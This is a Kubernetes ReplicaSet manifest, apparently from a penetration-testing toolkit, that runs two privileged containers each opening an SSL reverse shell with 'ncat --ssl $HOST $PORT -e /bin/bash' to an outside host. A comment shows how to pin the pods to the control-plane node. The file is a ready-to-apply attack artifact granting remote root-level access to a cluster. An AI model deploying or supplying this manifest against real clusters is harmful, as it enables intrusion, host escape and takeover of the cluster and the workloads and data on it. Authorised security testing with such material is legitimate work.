apiVersion: apps/v1
kind: ReplicaSet
metadata:
  name: priv-revshell-replicaset
  labels:
    app: pentest
    type: replicaset
spec:
  replicas: 2
  selector:
    matchLabels:
      type: replicaset
  template:
    metadata:
      labels:
        app: pentest
        type: replicaset
    spec:
      containers:
      - name: priv-revshell-replicaset
        image: raesene/ncat
        securityContext:
          privileged: true
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      